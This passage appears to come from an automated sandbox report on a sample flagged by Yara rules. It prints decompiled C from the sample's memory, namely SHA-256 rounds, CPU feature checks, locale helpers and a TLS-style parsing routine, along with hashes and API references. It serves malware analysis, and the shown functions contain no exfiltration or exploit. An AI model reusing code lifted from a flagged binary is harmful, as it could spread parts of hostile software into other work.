                              					_t405 = 0x19;
                              					_t213 = L0042DF6A(_t212, _t405);
                              					_t406 = 0xb;
                              					_t214 = L0042DF6A(_v8, _t406);
                              					_t407 = 6;
                              					_t215 = L0042DF6A(_v8, _t407);
                              					_t216 = _v40;
                              					_t42 = _t216 + 0x465670; // 0x428a2f98
                              					_t506 = (_t213 ^ _t214 ^ _t215) + ((_v16 ^ _v20) & _v8 ^ _v20) +  *_t42 +  *((intOrPtr*)(_t603 + _v40 - 0x148)) + _t563;
                              					_v32 = _v32 + _t506;
                              					_t408 = 0x16;
                              					_t217 = L0042DF6A(_v36, _t408);
                              					_t409 = 0xd;
                              					_t218 = L0042DF6A(_v36, _t409);
                              					_t219 = L0042DF6A(_v36, _t299);
                              					_t568 = _v32;
                              					_v12 = ((_v28 | _v36) & _v24 | _v28 & _v36) + (_t217 ^ _t218 ^ _t219) + _t506;
                              					_t411 = 0x19;
                              					_t222 = L0042DF6A(_t568, _t411);
                              					_t412 = 0xb;
                              					_t223 = L0042DF6A(_t568, _t412);
                              					_t413 = 6;
                              					_t224 = L0042DF6A(_t568, _t413);
                              					_t225 = _v40;
                              					_t60 = _t225 + 0x465674; // 0x71374491
                              					_t513 = (_t222 ^ _t223 ^ _t224) + ((_v16 ^ _v8) & _t568 ^ _v16) +  *_t60 +  *((intOrPtr*)(_t603 + _v40 - 0x144)) + _v20;
                              					_v24 = _v24 + _t513;
                              					_t414 = 0x16;
                              					_t226 = L0042DF6A(_v12, _t414);
                              					_t415 = 0xd;
                              					_t227 = L0042DF6A(_v12, _t415);
                              					_t228 = L0042DF6A(_v12, _t299);
                              					_t573 = _v24;
                              					_v20 = ((_v36 | _v12) & _v28 | _v36 & _v12) + (_t226 ^ _t227 ^ _t228) + _t513;
                              					_t422 = 0x19;
                              					_t231 = L0042DF6A(_t573, _t422);
                              					_t423 = 0xb;
                              					_t232 = L0042DF6A(_t573, _t423);
                              					_t424 = 6;
                              					_t233 = L0042DF6A(_t573, _t424);
                              					_t234 = _v40;
                              					_t79 = _t234 + 0x465678; // 0xb5c0fbcf
                              					_t520 = (_t231 ^ _t232 ^ _t233) + ((_v32 ^ _v8) & _t573 ^ _v8) +  *_t79 +  *((intOrPtr*)(_t603 + _v40 - 0x140)) + _v16;
                              					_v28 = _v28 + _t520;
                              					_t425 = 0x16;
                              					_t235 = L0042DF6A(_v20, _t425);
                              					_t426 = 0xd;
                              					_t236 = L0042DF6A(_v20, _t426);
                              					_t237 = L0042DF6A(_v20, _t299);
                              					_t578 = _v28;
                              					_v16 = ((_v12 | _v20) & _v36 | _v12 & _v20) + (_t235 ^ _t236 ^ _t237) + _t520;
                              					_t433 = 0x19;
                              					_t240 = L0042DF6A(_t578, _t433);
                              					_t434 = 0xb;
                              					_t241 = L0042DF6A(_t578, _t434);
                              					_t435 = 6;
                              					_t242 = L0042DF6A(_t578, _t435);
                              					_t243 = _v40;
                              					_t98 = _t243 + 0x46567c; // 0xe9b5dba5
                              					_t527 = (_t240 ^ _t241 ^ _t242) + ((_v24 ^ _v32) & _t578 ^ _v32) +  *_t98 +  *((intOrPtr*)(_t603 + _v40 - 0x13c)) + _v8;
                              					_v36 = _v36 + _t527;
                              					_t436 = 0x16;
                              					_t244 = L0042DF6A(_v16, _t436);
                              					_t437 = 0xd;
                              					_t245 = L0042DF6A(_v16, _t437);
                              					_t246 = L0042DF6A(_v16, _t299);
                              					_t583 = _v36;
                              					_v8 = ((_v16 | _v20) & _v12 | _v16 & _v20) + (_t244 ^ _t245 ^ _t246) + _t527;
                              					_t444 = 0x19;
                              					_t249 = L0042DF6A(_t583, _t444);
                              					_t445 = 0xb;
                              					_t250 = L0042DF6A(_t583, _t445);
                              					_t446 = 6;
                              					_t251 = L0042DF6A(_t583, _t446);
                              					_t252 = _v40;
                              					_t117 = _t252 + 0x465680; // 0x3956c25b
                              					_t534 = (_t249 ^ _t250 ^ _t251) + ((_v24 ^ _v28) & _t583 ^ _v24) +  *_t117 +  *((intOrPtr*)(_t603 + _v40 - 0x138)) + _v32;
                              					_t254 = _v12 + _t534;
                              					_t447 = 0x16;
                              					_v12 = _t254;
                              					_v44 = _t254;
                              					_t255 = L0042DF6A(_v8, _t447);
                              					_t448 = 0xd;
                              					_t256 = L0042DF6A(_v8, _t448);
                              					_t454 = ((_v16 | _v8) & _v20 | _v16 & _v8) + (_t255 ^ _t256 ^ L0042DF6A(_v8, _t299)) + _t534;
                              					_t588 = _v12;
                              					_v32 = _t454;
                              					_v60 = _t454;
                              					_t455 = 0x19;
                              					_t260 = L0042DF6A(_t588, _t455);
                              					_t456 = 0xb;
                              					_t261 = L0042DF6A(_t588, _t456);
                              					_t457 = 6;
                              					_t262 = L0042DF6A(_t588, _t457);
                              					_t263 = _v40;
                              					_t138 = _t263 + 0x465684; // 0x59f111f1
                              					_t541 = (_t260 ^ _t261 ^ _t262) + ((_v28 ^ _v36) & _t588 ^ _v28) +  *_t138 +  *((intOrPtr*)(_t603 + _v40 - 0x134)) + _v24;
                              					_t265 = _v20 + _t541;
                              					_t458 = 0x16;
                              					_v20 = _t265;
                              					_v48 = _t265;
                              					_t266 = L0042DF6A(_v32, _t458);
                              					_t459 = 0xd;
                              					_t267 = L0042DF6A(_v32, _t459);
                              					_t465 = ((_v32 | _v8) & _v16 | _v32 & _v8) + (_t266 ^ _t267 ^ L0042DF6A(_v32, _t299)) + _t541;
                              					_t593 = _v20;
                              					_v24 = _t465;
                              					_v64 = _t465;
                              					_t466 = 0x19;
                              					_t271 = L0042DF6A(_t593, _t466);
                              					_t467 = 0xb;
                              					_t272 = L0042DF6A(_t593, _t467);
                              					_t468 = 6;
                              					_t273 = L0042DF6A(_t593, _t468);
                              					_t158 = _v40 + 0x465688; // 0x923f82a4
                              					_t548 = (_t271 ^ _t272 ^ _t273) + ((_v36 ^ _v12) & _t593 ^ _v36) +  *_t158 +  *((intOrPtr*)(_t603 + _v40 - 0x130)) + _v28;
                              					_t276 = _v16 + _t548;
                              					_t469 = 0x16;
                              					_v16 = _t276;
                              					_v52 = _t276;
                              					_t277 = L0042DF6A(_v24, _t469);
                              					_t470 = 0xd;
                              					_t278 = L0042DF6A(_v24, _t470);
                              					_t476 = ((_v24 | _v32) & _v8 | _v24 & _v32) + (_t277 ^ _t278 ^ L0042DF6A(_v24, _t299)) + _t548;
                              					_t598 = _v16;
                              					_v28 = _t476;
                              					_v68 = _t476;
                              					_t477 = 0x19;
                              					_t282 = L0042DF6A(_t598, _t477);
                              					_t478 = 0xb;
                              					_t283 = L0042DF6A(_t598, _t478);
                              					_t479 = 6;
                              					_t284 = L0042DF6A(_t598, _t479);
                              					_t285 = _v40;
                              					_t180 = _t285 + 0x46568c; // 0xab1c5ed5
                              					_t555 = (_t282 ^ _t283 ^ _t284) + ((_v12 ^ _v20) & _t598 ^ _v12) +  *_t180 +  *((intOrPtr*)(_t603 + _v40 - 0x12c)) + _v36;
                              					_t287 = _v8 + _t555;
                              					_t480 = 0x16;
                              					_v8 = _t287;
                              					_v56 = _t287;
                              					_t288 = L0042DF6A(_v28, _t480);
                              					_t481 = 0xd;
                              					_t289 = L0042DF6A(_v28, _t481);
                              					_t487 = ((_v24 | _v28) & _v32 | _v24 & _v28) + (_t288 ^ _t289 ^ L0042DF6A(_v28, _t299)) + _t555;
                              					_t563 = _v12;
                              					_t294 = _v40 + 0x20;
                              					_v40 = _t294;
                              					_t212 = _v8;
                              					_v36 = _t487;
                              					_v72 = _t487;
                              				} while (_t294 < 0x100);
                              				_t295 = _v76;
                              				do {
                              					asm("movups xmm0, [eax]");
                              					asm("movups xmm1, [ecx+eax]");
                              					asm("paddd xmm1, xmm0");
                              					asm("movups [eax], xmm1");
                              					_t295 = _t295 + 0x10;
                              					_t299 = _t299 - 1;
                              				} while (_t299 != 0);
                              				return 0;
                              			}

                              Instruction addresses (side-by-side column from the report): 0x0042e02d to 0x0042e35a

                              0x0042e35c
                              0x0042e35d
                              0x0042e360
                              0x0042e363
                              0x0042e36f
                              0x0042e370
                              0x0042e395
                              0x0042e397
                              0x0042e39c
                              0x0042e3a1
                              0x0042e3a4
                              0x0042e3a5
                              0x0042e3ac
                              0x0042e3b1
                              0x0042e3b8
                              0x0042e3bd
                              0x0042e3ca
                              0x0042e3d9
                              0x0042e3e9
                              0x0042e3ec
                              0x0042e3ee
                              0x0042e3ef
                              0x0042e3f2
                              0x0042e3f5
                              0x0042e401
                              0x0042e402
                              0x0042e427
                              0x0042e429
                              0x0042e42e
                              0x0042e433
                              0x0042e436
                              0x0042e437
                              0x0042e43e
                              0x0042e443
                              0x0042e44a
                              0x0042e44f
                              0x0042e466
                              0x0042e476
                              0x0042e47c
                              0x0042e480
                              0x0042e481
                              0x0042e484
                              0x0042e487
                              0x0042e493
                              0x0042e494
                              0x0042e4b9
                              0x0042e4bb
                              0x0042e4c0
                              0x0042e4c5
                              0x0042e4c8
                              0x0042e4c9
                              0x0042e4d0
                              0x0042e4d5
                              0x0042e4dc
                              0x0042e4e1
                              0x0042e4ee
                              0x0042e4fd
                              0x0042e50d
                              0x0042e510
                              0x0042e512
                              0x0042e513
                              0x0042e516
                              0x0042e519
                              0x0042e525
                              0x0042e526
                              0x0042e54b
                              0x0042e550
                              0x0042e553
                              0x0042e556
                              0x0042e55e
                              0x0042e561
                              0x0042e564
                              0x0042e564
                              0x0042e56d
                              0x0042e575
                              0x0042e575
                              0x0042e578
                              0x0042e57c
                              0x0042e580
                              0x0042e583
                              0x0042e586
                              0x0042e586
                              0x0042e593

                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 0
                              • API String ID: 0-4108050209
                              • Opcode ID: 7d2c2cc3d4cde4dcaf023a8c72c5331c45858dbf77c38728ee6bef2936cd2860
                              • Instruction ID: d2f6e491d6231a107fc41d217f42edd413d61a9e26abbc05e72102d8d9d5ba4e
                              • Opcode Fuzzy Hash: 7d2c2cc3d4cde4dcaf023a8c72c5331c45858dbf77c38728ee6bef2936cd2860
                              • Instruction Fuzzy Hash: E4126432F002199BDF04DBA5DD52AEDB3F2BF8C714F26806AD515B7381DA746D418B88
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 84%
                              			E0042F2AB(intOrPtr __edx) {
                              				signed int _v8;
                              				signed int _v12;
                              				signed int _v16;
                              				signed char _v20;
                              				signed int _v24;
                              				signed int _v28;
                              				signed int _v32;
                              				signed int _v36;
                              				signed int _v40;
                              				signed int _v44;
                              				intOrPtr _t51;
                              				signed int _t53;
                              				signed int _t56;
                              				signed int _t57;
                              				intOrPtr _t59;
                              				signed int _t60;
                              				signed int _t62;
                              				intOrPtr _t67;
                              				intOrPtr _t68;
                              				intOrPtr* _t70;
                              				intOrPtr _t76;
                              				intOrPtr _t81;
                              				intOrPtr* _t83;
                              				signed int _t84;
                              				signed int _t87;
                              
                              				_t81 = __edx;
                              				 *0x46ad0c =  *0x46ad0c & 0x00000000;
                              				 *0x46a010 =  *0x46a010 | 1;
                              				if(IsProcessorFeaturePresent(0xa) == 0) {
                              					L20:
                              					return 0;
                              				}
                              				_v20 = _v20 & 0x00000000;
                              				 *0x46a010 =  *0x46a010 | 0x00000002;
                              				 *0x46ad0c = 1;
                              				_t83 =  &_v44;
                              				_push(1);
                              				asm("cpuid");
                              				_pop(_t67);
                              				 *_t83 = 0;
                              				 *((intOrPtr*)(_t83 + 4)) = 1;
                              				 *((intOrPtr*)(_t83 + 8)) = 0;
                              				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
                              				_v12 = _v44;
                              				_t51 = 1;
                              				_t76 = 0;
                              				_push(1);
                              				asm("cpuid");
                              				_pop(_t68);
                              				 *_t83 = _t51;
                              				 *((intOrPtr*)(_t83 + 4)) = _t67;
                              				 *((intOrPtr*)(_t83 + 8)) = _t76;
                              				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
                              				if((_v32 ^ 0x49656e69 | _v36 ^ 0x6c65746e | _v40 ^ 0x756e6547) != 0) {
                              					L9:
                              					_t84 =  *0x46ad10; // 0x2
                              					L10:
                              					_v28 = _v32;
                              					_t53 = _v36;
                              					_v8 = _t53;
                              					_v24 = _t53;
                              					if(_v12 >= 7) {
                              						_t59 = 7;
                              						_push(_t68);
                              						asm("cpuid");
                              						_t70 =  &_v44;
                              						 *_t70 = _t59;
                              						 *((intOrPtr*)(_t70 + 4)) = _t68;
                              						 *((intOrPtr*)(_t70 + 8)) = 0;
                              						 *((intOrPtr*)(_t70 + 0xc)) = _t81;
                              						_t60 = _v40;
                              						_v20 = _t60;
                              						_t53 = _v8;
                              						if((_t60 & 0x00000200) != 0) {
                              							 *0x46ad10 = _t84 | 0x00000002;
                              						}
                              					}
                              					if((_t53 & 0x00100000) != 0) {
                              						 *0x46a010 =  *0x46a010 | 0x00000004;
                              						 *0x46ad0c = 2;
                              						if((_t53 & 0x08000000) != 0 && (_t53 & 0x10000000) != 0) {
                              							asm("xgetbv");
                              							_v16 = _t53;
                              							_v12 = _t81;
                              							if((_v16 & 0x00000006) == 6 && 0 == 0) {
                              								_t56 =  *0x46a010; // 0x2f
                              								_t57 = _t56 | 0x00000008;
                              								 *0x46ad0c = 3;
                              								 *0x46a010 = _t57;
                              								if((_v20 & 0x00000020) != 0) {
                              									 *0x46ad0c = 5;
                              									 *0x46a010 = _t57 | 0x00000020;
                              								}
                              							}
                              						}
                              					}
                              					goto L20;
                              				}
                              				_t62 = _v44 & 0x0fff3ff0;
                              				if(_t62 == 0x106c0 || _t62 == 0x20660 || _t62 == 0x20670 || _t62 == 0x30650 || _t62 == 0x30660 || _t62 == 0x30670) {
                              					_t87 =  *0x46ad10; // 0x2
                              					_t84 = _t87 | 0x00000001;
                              					 *0x46ad10 = _t84;
                              					goto L10;
                              				} else {
                              					goto L9;
                              				}
                              			}

                              APIs
                              • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 0042F2C4
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: FeaturePresentProcessor
                              • String ID:
                              • API String ID: 2325560087-0
                              • Opcode ID: 236d1fbffacee29ac2072d7646572aa4fef94a32c5531d6a83f556afadd58c04
                              • Instruction ID: e14bd6c5a23f6b1c66d5c7ff4ee57b294b174c7bca6555511f9b3344fc2a95c0
                              • Opcode Fuzzy Hash: 236d1fbffacee29ac2072d7646572aa4fef94a32c5531d6a83f556afadd58c04
                              • Instruction Fuzzy Hash: CD419171A006159BEB14CF55E88579ABBF4FB04310FA0857BD805E7350E3B89964CF99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 59%
                              			E00449143(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                              				signed int _v8;
                              				short _v248;
                              				void* __ebp;
                              				signed int _t16;
                              				signed int _t22;
                              				void* _t24;
                              				void* _t31;
                              				void* _t35;
                              				signed int* _t50;
                              				int _t53;
                              				signed int _t54;
                              
                              				_t16 =  *0x46a00c; // 0x7df2b874
                              				_v8 = _t16 ^ _t54;
                              				_t35 = L00440972(__ebx, __ecx, __edx);
                              				_t50 =  *(L00440972(_t35, __ecx, __edx) + 0x34c);
                              				_t53 = E0044921B(_a4);
                              				asm("sbb ecx, ecx");
                              				_t22 = GetLocaleInfoW(_t53, ( ~( *(_t35 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                              				if(_t22 != 0) {
                              					_t24 = E0044C0C1(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
                              					if(_t24 != 0) {
                              						if( *(_t35 + 0x60) == 0 &&  *((intOrPtr*)(_t35 + 0x5c)) != 0) {
                              							_t31 = E0044C0C1(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
                              							if(_t31 == 0) {
                              								_push(_t50);
                              								_push(_t31);
                              								goto L9;
                              							}
                              						}
                              					} else {
                              						if( *(_t35 + 0x60) != _t24) {
                              							L10:
                              							 *_t50 =  *_t50 | 0x00000004;
                              							_t50[1] = _t53;
                              							_t50[2] = _t53;
                              						} else {
                              							_push(_t50);
                              							_push(1);
                              							L9:
                              							_push(_t53);
                              							if(E00449373(_t35) != 0) {
                              								goto L10;
                              							}
                              						}
                              					}
                              				} else {
                              					 *_t50 =  *_t50 & _t22;
                              				}
                              				return L0042F61B(_v8 ^ _t54);
                              			}

                              APIs
                                • Part of subcall function 00440972: GetLastError.KERNEL32(?,00000000,0043A4F3,?,00416A26,-0046DD2C,?,?,?,?,?,0040B275,.vbs), ref: 00440976
                                • Part of subcall function 00440972: _free.LIBCMT ref: 004409A9
                                • Part of subcall function 00440972: SetLastError.KERNEL32(00000000,?,00416A26,-0046DD2C,?,?,?,?,?,0040B275,.vbs), ref: 004409EA
                                • Part of subcall function 00440972: _abort.LIBCMT ref: 004409F0
                                • Part of subcall function 00440972: _free.LIBCMT ref: 004409D1
                                • Part of subcall function 00440972: SetLastError.KERNEL32(00000000,?,00416A26,-0046DD2C,?,?,?,?,?,0040B275,.vbs), ref: 004409DE
                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00449197
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$_free$InfoLocale_abort
                              • String ID:
                              • API String ID: 1663032902-0
                              • Opcode ID: ceb4882ea065f60f5ad7294d839268fede538349977b750f8739ae3ac4be151b
                              • Instruction ID: b23328cae5c81917ebfd14750ae41a33c51d25984a081319408a22a244c59ce8
                              • Opcode Fuzzy Hash: ceb4882ea065f60f5ad7294d839268fede538349977b750f8739ae3ac4be151b
                              • Instruction Fuzzy Hash: 6621C57251520BABFB289E25DC8AABB77A8EB04314F1001BBFD01C7241EB799D41DB59
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E00449373(void* __ebx, signed int _a4, intOrPtr _a8) {
                              				short _v8;
                              				void* __ecx;
                              				void* __ebp;
                              				void* _t8;
                              				void* _t12;
                              				intOrPtr _t13;
                              				void* _t16;
                              				void* _t20;
                              				void* _t22;
                              				void* _t24;
                              				signed int _t27;
                              				intOrPtr* _t29;
                              
                              				_push(_t16);
                              				_t8 = L00440972(__ebx, _t16, _t22);
                              				_t27 = _a4;
                              				_t24 = _t8;
                              				if(GetLocaleInfoW(_t27 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) != 0) {
                              					if(_t27 == _v8 || _a8 == 0) {
                              						L7:
                              						_t12 = 1;
                              					} else {
                              						_t29 =  *((intOrPtr*)(_t24 + 0x50));
                              						_t20 = _t29 + 2;
                              						do {
                              							_t13 =  *_t29;
                              							_t29 = _t29 + 2;
                              						} while (_t13 != 0);
                              						if(L00448EC7( *((intOrPtr*)(_t24 + 0x50))) == _t29 - _t20 >> 1) {
                              							goto L1;
                              						} else {
                              							goto L7;
                              						}
                              					}
                              				} else {
                              					L1:
                              					_t12 = 0;
                              				}
                              				return _t12;
                              			}

                              APIs
                                • Part of subcall function 00440972: GetLastError.KERNEL32(?,00000000,0043A4F3,?,00416A26,-0046DD2C,?,?,?,?,?,0040B275,.vbs), ref: 00440976
                                • Part of subcall function 00440972: _free.LIBCMT ref: 004409A9
                                • Part of subcall function 00440972: SetLastError.KERNEL32(00000000,?,00416A26,-0046DD2C,?,?,?,?,?,0040B275,.vbs), ref: 004409EA
                                • Part of subcall function 00440972: _abort.LIBCMT ref: 004409F0
                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00449111,00000000,00000000,?), ref: 0044939F
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$InfoLocale_abort_free
                              • String ID:
                              • API String ID: 2692324296-0
                              • Opcode ID: 4f2b17c09b9bc9ec24eb5d51f95e87c1389d952b0495a652764951bb53b878ea
                              • Instruction ID: e088f05e704de54da1791b93b42debfc98a9ea1916be425aaf6d46112b02c247
                              • Opcode Fuzzy Hash: 4f2b17c09b9bc9ec24eb5d51f95e87c1389d952b0495a652764951bb53b878ea
                              • Instruction Fuzzy Hash: 4BF07D32900116BBFB285E24CC057BB7758EB46358F04442AEC15E3280EB78FD01D6D4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 96%
                              			E0041A3F8(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
                              				signed char _v7;
                              				signed int _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
                              				signed int _v20;
                              				signed int _v24;
                              				signed int _v28;
                              				signed int _v34;
                              				signed int _v40;
                              				signed int _v44;
                              				signed int _v48;
                              				signed int _v52;
                              				intOrPtr _v56;
                              				intOrPtr _v60;
                              				intOrPtr* _v64;
                              				intOrPtr _v68;
                              				void _v72;
                              				void* __edi;
                              				void* _t251;
                              				void _t254;
                              				signed char _t272;
                              				void* _t274;
                              				intOrPtr _t275;
                              				intOrPtr* _t280;
                              				void* _t281;
                              				void* _t285;
                              				intOrPtr _t292;
                              				void* _t318;
                              				signed short _t321;
                              				intOrPtr _t326;
                              				void* _t338;
                              				void* _t350;
                              				void* _t362;
                              				signed char _t370;
                              				signed int _t371;
                              				intOrPtr _t374;
                              				intOrPtr* _t375;
                              				signed int _t377;
                              				intOrPtr _t379;
                              				signed int _t384;
                              				signed int _t385;
                              				signed int _t389;
                              				signed int _t395;
                              				signed int _t436;
                              				signed int _t438;
                              				signed char _t442;
                              				intOrPtr _t445;
                              				signed int _t447;
                              				void* _t448;
                              				signed char _t449;
                              				void* _t454;
                              				intOrPtr _t475;
                              				intOrPtr _t480;
                              				intOrPtr _t481;
                              				intOrPtr* _t482;
                              				intOrPtr _t483;
                              				intOrPtr _t484;
                              				intOrPtr _t485;
                              				signed int _t486;
                              				intOrPtr _t488;
                              				signed int _t489;
                              				void* _t490;
                              				void* _t491;
                              				void* _t492;
                              				void* _t493;
                              				void* _t497;
                              
                              				_t375 = __ecx;
                              				_v12 = __edx;
                              				_t377 = 0xa;
                              				_t442 =  *(__ecx + 0x308) & 0x0000ffff;
                              				_t486 = 0;
                              				_t251 = memset( &_v72, 0, _t377 << 2);
                              				_t491 = _t490 + 0xc;
                              				 *(_t375 + 0x318) = _t251;
                              				_v28 = _t251;
                              				_v24 = _t251;
                              				_t480 =  *_a4;
                              				_v60 = _t480;
                              				_t379 = _t480;
                              				_v56 = _t379;
                              				if(_t442 < 0x8000) {
                              					L9:
                              					_push(0x48);
                              					_t254 = L0042D5FA();
                              					_v72 = _t254;
                              					if(_t254 == 0) {
                              						L8:
                              						_t486 = 0xffffff83;
                              						L120:
                              						E0041A295( &_v72);
                              						L004196CA(_t375);
                              						return _t486;
                              					}
                              					L00431810(_t480, _t254, 0, 0x48);
                              					_t492 = _t491 + 0xc;
                              					if(_t480 - _v56 + 3 > _a8) {
                              						L2:
                              						_t486 = 0xfffffeb8;
                              						goto L120;
                              					}
                              					L004189B4(_t480 + _v12,  &_v20);
                              					_t384 = _v20;
                              					_t481 = _t480 + 3;
                              					_v60 = _t481;
                              					_v16 = _t384;
                              					if(_t384 > 0x481e) {
                              						goto L2;
                              					}
                              					_t445 = _v56;
                              					if(_t384 - _t445 + _t481 != _a8) {
                              						goto L2;
                              					}
                              					_t385 = _v52;
                              					if(_t384 == 0) {
                              						L24:
                              						_v44 = _v44 & 0x00000000;
                              						_v48 = _t385;
                              						if(_t385 != 0) {
                              							L30:
                              							_v34 = _v34 & 0x0000fffb;
                              							_t482 = L0042D5FA();
                              							_v64 = _t482;
                              							if(_t482 == 0) {
                              								goto L8;
                              							}
                              							L00431810(_t482, _t482, 0, 0x370);
                              							_t387 = _v52;
                              							_t447 = 1;
                              							_t493 = _t492 + 0xc;
                              							 *(_t375 + 0x318) = 1;
                              							if(_t387 <= 0 || _t387 <= 1) {
                              								L50:
                              								if(_t486 != 0) {
                              									goto L120;
                              								}
                              								 *(_t375 + 0x318) = 2;
                              								if(_v48 <= _t486) {
                              									_t448 = 0;
                              									L64:
                              									_t449 = _t448 + 1;
                              									L65:
                              									_t389 = _v34 & _t449;
                              									_v24 = _t389;
                              									if(_t389 == 0 || _t486 == 0) {
                              										 *(_t375 + 0x318) = 3;
                              										if(_v48 <= 0) {
                              											L103:
                              											if(_v24 == 0 || _t486 == 0) {
                              												 *(_t375 + 0x318) = 4;
                              												if(_v40 != 0) {
                              													_t486 =  ==  ? _v40 : _t486;
                              												}
                              												_t486 = E0041A146( *((intOrPtr*)( *_t375 + 0x50)), _t375, _t486,  &_v72);
                              												_t272 =  *(_t375 + 0x308) & 0x0000ffff;
                              												_t395 = _t272 & 0x00000080;
                              												if(_t395 != 0 && (_t486 == 0xfffffe96 || _t486 == 0xfffffe97)) {
                              													 *(_t375 + 0x1f0) =  *(_t375 + 0x1f0) & 0x00000000;
                              													_t486 = 0;
                              												}
                              												if(_t486 == 0) {
                              													if((_t272 & 0x00000030) == 0x10) {
                              														 *((char*)(_t375 + 0x311)) = 5;
                              													}
                              												} else {
                              													if(_t395 == 0) {
                              														E0041A0E7(_t375, _t486);
                              													}
                              													 *(_t375 + 0x1f0) = _t486;
                              												}
                              												_t274 = L00418A30(_t375);
                              												_t275 = _v60;
                              												if(_t274 != 0) {
                              													_t275 = _t275 +  *((intOrPtr*)(_t375 + 0x300));
                              													_v60 = _t275;
                              												}
                              												 *(_t375 + 0x318) = 5;
                              												 *_a4 = _t275;
                              											}
                              											goto L120;
                              										}
                              										if( *(_t482 + 0x36c) >= 0x80) {
                              											if( *((intOrPtr*)(_t375 + 0x227)) == _t449 && ( *(_t375 + 0x308) & 0x00000030) == 0x10) {
                              												_t486 =  ==  ? 0xfffffe7f : _t486;
                              											}
                              											_t292 =  *((intOrPtr*)(_t375 + 0x228));
                              											if(_t292 == _t449 || _t292 == 3 &&  *((char*)(_t375 + 0x22b)) == 0) {
                              												_t486 =  ==  ? 0xfffffe81 : _t486;
                              											}
                              										}
                              										if(( *(_t482 + 0x36d) & _t449) != 0) {
                              											if(( *(_t375 + 0x308) & 0x00000030) != 0x10) {
                              												_t486 =  ==  ? 0xfffffe7e : _t486;
                              											} else {
                              												if(( *(_t482 + 0x31c) & 0x00000003) == 0) {
                              													_t486 = 0xfffffe7e;
                              												}
                              											}
                              										}
                              										if(_t389 == 0) {
                              											 *(_t375 + 0x30a) =  *(_t375 + 0x30a) | 0x00002000;
                              											if(( *(_t375 + 0x308) & 0x00000080) == 0) {
                              												_t286 =  *((intOrPtr*)(_t375 + 0xf8));
                              												if( *((intOrPtr*)(_t375 + 0xf8)) != 0) {
                              													if( *((intOrPtr*)(_t482 + 0x24)) == 0) {
                              														L00419FE5( *((intOrPtr*)(_t482 + 0x7c)), _t286);
                              														_t486 =  ==  ? 0xfffffebe : _t486;
                              													} else {
                              														_push(_t389);
                              														if(E0041A08D(_t286) != 1) {
                              															_t486 = 0xfffffebe;
                              														}
                              													}
                              												}
                              											}
                              											if( *((intOrPtr*)(_t482 + 0x1c)) != 0x206) {
                              												goto L103;
                              											} else {
                              												_v28 = _v28 & 0x00000000;
                              												_t280 = _t375 + 0x37c;
                              												_t399 =  *_t280;
                              												if( *_t280 != 0) {
                              													if( *((char*)(_t375 + 0x382)) == 0) {
                              														L96:
                              														_t281 = E00426383( *_t482,  &_v28,  *_t280,  *((intOrPtr*)(_t482 + 4)));
                              														if(_t281 != 0) {
                              															L98:
                              															_t486 = 0xfffffeaa;
                              															L99:
                              															if(_t486 == 0 &&  *((char*)(_t375 + 0x382)) != 0 && ( *(_t375 + 0x308) & 0x00000080) == 0) {
                              																L0042990C( *((intOrPtr*)(_t375 + 0x37c)));
                              																_t486 =  <  ? 0xfffffe66 : _t486;
                              															}
                              															goto L103;
                              														}
                              														 *((char*)(_t375 + 0x382)) = _t281 + 1;
                              														goto L99;
                              													}
                              													_t285 = L004196A9(_t375, _t399);
                              													 *((char*)(_t375 + 0x382)) = 0;
                              													L94:
                              													if(_t285 != 0) {
                              														goto L98;
                              													}
                              													_t280 = _t375 + 0x37c;
                              													goto L96;
                              												}
                              												_push(_t280);
                              												_t454 = 0x25;
                              												_t285 = L00419618(_t454);
                              												goto L94;
                              											}
                              										} else {
                              											 *(_t375 + 0x1f0) = _t486;
                              											goto L120;
                              										}
                              									} else {
                              										goto L120;
                              									}
                              								}
                              								_v44 = _v44 & _t486;
                              								_t486 = E0041A2E3(_t375,  &_v72, _t387,  !(( *(_t375 + 0x308) & 0x0000ffff) >> 7) & _t447,  &_v28,  &_v24);
                              								if(_t486 != 0) {
                              									if(_t486 == 0xffffff74 || _t486 == 0xffffff7c) {
                              										_t482 = _v64;
                              										_t449 = 1;
                              										_v34 = _v34 | 1;
                              									} else {
                              										_t482 = _v64;
                              										_t449 = 1;
                              										if( *((intOrPtr*)(_t375 + 0x80)) == 0) {
                              											_v34 = _v34 | 1;
                              										} else {
                              											_v34 = _v34 ^ (_v34 >> 0x00000001 ^ _v34) & 1;
                              										}
                              									}
                              									goto L65;
                              								}
                              								_t482 = _v64;
                              								_t448 = 0;
